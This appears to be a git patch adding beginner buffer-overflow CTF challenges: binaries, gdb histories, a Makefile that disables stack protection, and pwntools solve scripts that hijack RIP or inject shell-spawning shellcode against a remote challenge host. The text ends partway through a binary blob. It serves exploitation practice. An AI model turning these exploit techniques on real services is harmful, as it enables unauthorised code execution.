From 563524658109056bb3737486c1544fdfceca3c5f Mon Sep 17 00:00:00 2001
From: emln <em1l14n0s@gmail.com>
Date: Sat, 9 May 2026 20:58:42 +0200
Subject: [PATCH] First CTFs

---
 BOF/.gdb_history                           |   2 +
 BOF/01_guestbook/.gdb_history              |   1 +
 BOF/01_guestbook/guestbook                 | Bin 0 -> 19288 bytes
 BOF/01_guestbook/solve.py                  |  18 +++++++
 BOF/02_whispered_secrets/.gdb_history      |   2 +
 BOF/02_whispered_secrets/solve.py          |  20 ++++++++
 BOF/02_whispered_secrets/whispered_secrets | Bin 0 -> 19088 bytes
 BOF/03_tiny_escape_room/.gdb_history       |   4 ++
 BOF/03_tiny_escape_room/Makefile           |  10 ++++
 BOF/03_tiny_escape_room/escape_room        | Bin 0 -> 19456 bytes
 BOF/03_tiny_escape_room/main.c             |  37 ++++++++++++++
 BOF/03_tiny_escape_room/solve.py           |  33 +++++++++++++
 BOF/04_lemonade_stand/.gdb_history         |  53 +++++++++++++++++++++
 BOF/04_lemonade_stand/lemonade_stand       | Bin 0 -> 19312 bytes
 BOF/04_lemonade_stand/solve.py             |  16 +++++++
 BOF/05_mini_game_arena/.gdb_history        |   3 ++
 BOF/05_mini_game_arena/mini_game           | Bin 0 -> 19312 bytes
 BOF/05_mini_game_arena/solve.py            |  18 +++++++
 BOF/06_cosmic_burger_joint/.gdb_history    |   4 ++
 BOF/06_cosmic_burger_joint/cosmic_burger   | Bin 0 -> 19344 bytes
 BOF/06_cosmic_burger_joint/solve.py        |  23 +++++++++
 21 files changed, 244 insertions(+)
 create mode 100644 BOF/.gdb_history
 create mode 100644 BOF/01_guestbook/.gdb_history
 create mode 100755 BOF/01_guestbook/guestbook
 create mode 100644 BOF/01_guestbook/solve.py
 create mode 100644 BOF/02_whispered_secrets/.gdb_history
 create mode 100644 BOF/02_whispered_secrets/solve.py
 create mode 100755 BOF/02_whispered_secrets/whispered_secrets
 create mode 100644 BOF/03_tiny_escape_room/.gdb_history
 create mode 100644 BOF/03_tiny_escape_room/Makefile
 create mode 100755 BOF/03_tiny_escape_room/escape_room
 create mode 100644 BOF/03_tiny_escape_room/main.c
 create mode 100644 BOF/03_tiny_escape_room/solve.py
 create mode 100644 BOF/04_lemonade_stand/.gdb_history
 create mode 100755 BOF/04_lemonade_stand/lemonade_stand
 create mode 100644 BOF/04_lemonade_stand/solve.py
 create mode 100644 BOF/05_mini_game_arena/.gdb_history
 create mode 100755 BOF/05_mini_game_arena/mini_game
 create mode 100644 BOF/05_mini_game_arena/solve.py
 create mode 100644 BOF/06_cosmic_burger_joint/.gdb_history
 create mode 100755 BOF/06_cosmic_burger_joint/cosmic_burger
 create mode 100644 BOF/06_cosmic_burger_joint/solve.py

diff --git a/BOF/.gdb_history b/BOF/.gdb_history
new file mode 100644
index 0000000..58afc78
--- /dev/null
+++ b/BOF/.gdb_history
@@ -0,0 +1,2 @@
+run
+quit
diff --git a/BOF/01_guestbook/.gdb_history b/BOF/01_guestbook/.gdb_history
new file mode 100644
index 0000000..ff60466
--- /dev/null
+++ b/BOF/01_guestbook/.gdb_history
@@ -0,0 +1 @@
+quit
diff --git a/BOF/01_guestbook/guestbook b/BOF/01_guestbook/guestbook
new file mode 100755
index 0000000000000000000000000000000000000000..1b70362ac2b766a297311c6d00fab30ac254afa6
GIT binary patch
literal 19288
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

literal 0
HcmV?d00001

diff --git a/BOF/01_guestbook/solve.py b/BOF/01_guestbook/solve.py
new file mode 100644
index 0000000..de70724
--- /dev/null
+++ b/BOF/01_guestbook/solve.py
@@ -0,0 +1,18 @@
+#!/usr/bin/env python3
+from pwn import *
+
+# context.binary = elf = ELF('guestbook',checksec=False)
+OFFSET_TO_RIP = 72
+ret = 0x40101A  # ROPGadget ret
+win = 0x40121B  # win address (nm)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13599)
+p.recvuntil(b"name?\n")
+
+payload = flat(
+    b"A" * OFFSET_TO_RIP,
+    p64(ret),
+    p64(win),
+)
+p.send(payload)
+p.interactive()
diff --git a/BOF/02_whispered_secrets/.gdb_history b/BOF/02_whispered_secrets/.gdb_history
new file mode 100644
index 0000000..a3e9e92
--- /dev/null
+++ b/BOF/02_whispered_secrets/.gdb_history
@@ -0,0 +1,2 @@
+r
+quit
diff --git a/BOF/02_whispered_secrets/solve.py b/BOF/02_whispered_secrets/solve.py
new file mode 100644
index 0000000..b404324
--- /dev/null
+++ b/BOF/02_whispered_secrets/solve.py
@@ -0,0 +1,20 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("whispered_secrets", checksec=False)
+context.arch = "amd64"
+context.os = "linux"
+
+OFFSET_TO_RIP = 136
+
+p = remote("offsec.m0lecon.it", 13528)
+
+leak_line = p.recvline_contains(b"secret:")
+buf_addr = int(leak_line.split(b"secret: ")[1].strip(), 16)
+log.info(f"buf = {buf_addr:#x}")
+# NX disabled
+shellcode = asm(shellcraft.sh())
+
+payload = flat(shellcode, b"A" * (OFFSET_TO_RIP - len(shellcode)), p64(buf_addr))
+p.sendafter(b"secret:\n", payload)
+p.interactive()
diff --git a/BOF/02_whispered_secrets/whispered_secrets b/BOF/02_whispered_secrets/whispered_secrets
new file mode 100755
index 0000000000000000000000000000000000000000..c41a3e652e4cb3014740913e87bdf8542dc96c3d
GIT binary patch
literal 19088
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
bwksmmc$|B}p(n3J@vrXG_@W2ksfzys9+{N>

literal 0
HcmV?d00001

diff --git a/BOF/03_tiny_escape_room/.gdb_history b/BOF/03_tiny_escape_room/.gdb_history
new file mode 100644
index 0000000..4add7a7
--- /dev/null
+++ b/BOF/03_tiny_escape_room/.gdb_history
@@ -0,0 +1,4 @@
+disass vuln
+run
+run
+quit
diff --git a/BOF/03_tiny_escape_room/Makefile b/BOF/03_tiny_escape_room/Makefile
new file mode 100644
index 0000000..0b65e39
--- /dev/null
+++ b/BOF/03_tiny_escape_room/Makefile
@@ -0,0 +1,10 @@
+CC = gcc
+CFLAGS = -fno-stack-protector -no-pie -O0 -g
+
+all: escape_room
+
+escape_room: main.c
+	$(CC) $(CFLAGS) -o $@ $<
+
+clean:
+	rm -f escape_room
diff --git a/BOF/03_tiny_escape_room/escape_room b/BOF/03_tiny_escape_room/escape_room
new file mode 100755
index 0000000000000000000000000000000000000000..91d3adc255027d059a4564f2f59497d57c4e62c8
GIT binary patch
literal 19456
zcmeHPeQ;FQb-!;{D=p}2C1H>dn5P(QoJ6~lkg>o97LZ`&@?}1390xyEyKl8yR=b<s
zw;;K8EJEv;U}xZu*tDh-H)&mGrt#oTn;}ldCBb7CH_2d+r_nTN!#HLJH%{WXu7}ni
z+uynOp4I9h(wTPJKia*Tch5P$bI$!Z_r1OMeOx^>v}KdWFa#%$SSv`n5C}_1<wBg@
zAVrN0h(-|>%fwPq3#0}|SZatWj_H&~DVX}Tofnk++KG`gJcBNhk`PR}g+$43I)yc>
z=t*i25>pXSGWq$4)w0n2W7??O!IbUF^_k?1WQHYS`k`(Z(@H;T%9U<qer1jFV;a_R
z8P}BkNF+ahQ2F`SDnF(dbbU-Yo)i;026R6LyvmPh4|J56y8V*cFRA^Q4k|anl<J_g
